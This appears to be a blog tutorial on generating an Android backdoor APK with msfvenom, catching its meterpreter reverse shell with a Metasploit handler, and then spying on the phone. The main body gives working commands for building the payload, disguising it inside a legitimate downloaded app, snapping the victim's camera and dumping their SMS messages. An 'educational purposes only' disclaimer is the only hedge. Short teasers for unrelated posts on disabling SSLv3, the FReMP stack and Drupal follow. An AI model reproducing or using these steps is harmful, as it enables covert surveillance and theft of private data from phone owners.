Skip to main content

[Android + msf]How to use Metasploit Framework on an Android Device?

Metasploit Framework(msf)

  • Linux-based OS
  • You'll need to have msfconsole installed on your machine
    You'll need to have msfvenom correctly installed on the machine. This will be used to generate the backdoor.
  •  Install apktool as well.
Note: This tutorial is meant for educational purposes only. Please don't misguide the purpose of this tutorial, you'll be responsible for any act of Hacking or theft.


1) First of all open up your terminal. (Ctrl + Alt + T)
$ sudo apt-get update
Update your repositories before starting.

2) Once updated, we can start. Simply follow the steps below to get started:
$ sudo msfvenom -p android/meterpreter/reverse_tcp LHOST='' LPORT='xxxx' R > testfile.apk
Replace "testfile" with any name you want. This will be the Main Activity, which when tapped on your android device will activate meterpreter on your terminal and let you gain full access to the victims android phone.

  • You can check out the architecture list for msfvenom here!
Set LHOST to the ip address of your machine and LPORT to any port number which is not being used by your network, for e.g 4444.
$ ifconfig
ifconfig will give you the IP address you need to start the exploit.

3) Once you've set LHOST and LPORT, Press Enter and wait till the Main activity is created.

4) After it's created, simply move the apk file to your phone and Install it.

5) Open ./msfconsole on your terminal.
$ sudo ./msfconsole
6) Once the console is up, turn it to the exploit mode by generating the following command:
msf > use multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST ''
msf exploit(handler) > set LPORT 'xxxx'

7) Almost done!
Run exploit and tap on the Main Activity you just installed on your android phone. This will give you access to the android phone from the terminal.
msf exploit(handler) > exploit
8) The meterpreter must be up and running by now. Run the help command to see the arguments you can use.
meterpreter > webcam_snap -i 2
You can also generate the backdoor in an existing app.
Simply download the app from the internet, and use the '-x' to specify the name of the app you just dowloaded.

After msfvenom re created the app, install it into your android phone and the remaining steps remains the same.

  • webcam_scap
    This will take a picture from the camera you specified, of course, if the android phone has front and back camera. The camera is specified in the form of index (-i).
    1: Front Camera
    2: Back Camera
  •  ps
    Will list all running activities on the phone. 
  •  dump_sms
    Will save all the messages sent and received on the android phone, to an external .txt file.

If you're having trouble, please leave it in the comments section below.

Popular posts from this blog

How to disable SSLv3 in ubuntu?

Why disable SSL 3.0? SSLv3 is not sufficiently secure. The replacement versions, in particular, Transport Layer Security(TLS) 1.2, are way more secure and capable protocols.  Poodle attack and End of SSLv3  In late September, a team at Google discovered a serious vulnerability(POODLE) in SSLv3 that can be exploited to steal confidential information, e.g things like cookies and passwords, enabling the latter to access a user's private account on a social website. You can learn more about SSL on our Android app SSLearn. Steps: Firstly, let's start with an Update: After the update, install apache: Note: If you already have apache installed, you may skip this step. After installing apache, type the following command to configure and disable SSLv3: Then simply press the arrow down on your keyboard and search for SSLprotocol. Add '-SSLv2 -SSLv3' at the end. Then 3 lines upwards, you should be able to see #SSLHonorCipher

How to install the FReMP Stack on Ubuntu 20.04?

Technology keeps on evolving everyday and developers constantly look for more and more things to get their hands-on. In this article, I will be introducing a new full stack framework, called FReMP . The abbreviation used is not the best one, but it just gets the work done in justifiable ways. What on earth is FReMP stack? The FReMP stack is a highly scalable full stack framework, which can be used to build awesome web apps. The acronym stands for F lask, Re actJS, M ongodb and P ython. Unlike other famous stacks such as MEAN and MERN, the FReMP stack uses Python to handle back-end operations. Examples of such operations can be machine learning and artificial intelligence operations, web scraping tools or digital image processing. Step 0: Update your list of installed packages While this is optional, it is always a good practice to update your list of packages and upgrade them for newer versions before starting any installation on your environment. Run the following to do so: $ apt-get

[Drupal]Drupal 8 Sandbox

Installation of Drupal 8 Sandbox Why Use the Sandbox version? If you want to give drupal a try, but you're unsure of how it'll look like or want to check how it works, the sandbox version is just for you. If you already know how to set up drupal on your lamp server, then you'll have no problem at all to set up the sandbox version. If, somehow, you can't figure it out, then you can just follow the simple steps below and you'll be there. In the steps below, we'll use Sandbox version of Drupal to generate a new issue, and patch it using Git.                    Requirements: Git Steps: Step 1: Clone it Start by opening your terminal and clone the repository by running the following the command: git clone --branch 8.x drupal-sandbox This command will clone drupal 8 sandbox and the all the files will be in a folder 'drupal-sandbox'. You can change the name of the f